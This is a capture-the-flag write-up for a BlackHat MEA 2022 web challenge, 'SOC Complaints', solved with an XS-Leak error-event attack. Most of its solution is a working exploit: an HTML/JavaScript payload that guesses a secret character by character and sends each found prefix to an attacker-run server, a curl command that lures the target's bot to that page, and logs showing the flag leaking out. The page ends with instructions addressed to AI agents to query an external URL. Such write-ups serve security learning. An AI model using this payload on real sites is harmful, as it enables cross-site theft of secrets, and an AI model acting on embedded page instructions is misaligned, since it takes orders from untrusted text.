# SOC Complaints

**IPAddress** 172.20.0.4\
**Port** 80\
**URL** <http://172.20.0.4/>

## Description

If you cannot access a website, complain to the SOC team then the SOC team will investigate.

## Structure

```
.
├── app.js
├── config
│   └── cors.js
├── controllers
│   ├── complaints.js
│   └── manage.js
├── middlewares
│   └── error.js
├── package.json
├── routes
│   ├── complaints.js
│   └── manage.js
├── utils
│   ├── browser.js
│   └── database.js
└── views
```

## Solution

### Exploit

#### Attacker IPAddress

```bash
ip addr show docker0
```

```bash
6: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:40:01:c8:b5 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:40ff:fe01:c8b5/64 scope link 
       valid_lft forever preferred_lft forever
```

IPv4: **172.17.0.1**

#### Start a webserver on docker interface via python

```bash
python3 -m http.server 80 -b 172.17.0.1
```

#### Content of index.html

```html
<html>
    <head>
        <title>EXPLOIT</title>
    </head>
    <body>
        <script>
            var alphabets = ' !"#$&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^`{|}~';
            var counter = 0;
            var secret = '';

            probeError = (url) => {
                let script = document.createElement('script');
                script.src = url;
                script.onload = async () => { 
                    secret = decodeURIComponent(url.split('?')[1].split('&')[1].split('=')[1]);
                    await fetch(`http://172.17.0.1/${secret}`);
                    counter = 0;
                    
                    probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);
                };
                script.onerror = () => {
                    counter = counter + 1;
                    probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);
                };
                document.head.appendChild(script);
            }
            probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);

        </script>
    </body>
</html>
```

#### Phish the SOC team

```bash
curl -X POST -H 'Content-type: application/json' -d '{"url": "http://172.17.0.1/"}' http://172.20.0.4/api/v1/complaints/
```

```json
{"message":"your request was successfully submitted"}
```

#### Flag

```bash
└─$ python3 -m http.server 80 -b 172.17.0.1
Serving HTTP on 172.17.0.1 port 80 (http://172.17.0.1:80/) ...
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET / HTTP/1.1" 200 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /T HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TCC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TCC%7B HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T-E HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T-EN HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENO HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOU HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUG HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUGH HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUGH%7D HTTP/1.1" 404 -
```

### Explanation

* [Error Events](https://xsleaks.dev/docs/attacks/error-events/)
* [Leaky Images: Targeted Privacy Attacks in the Web](https://www.usenix.org/system/files/sec19fall_staicu_prepub.pdf)<br>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.diefunction.io/ctf/technology-control-company/blackhat-mea-2022/soc-complaints.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.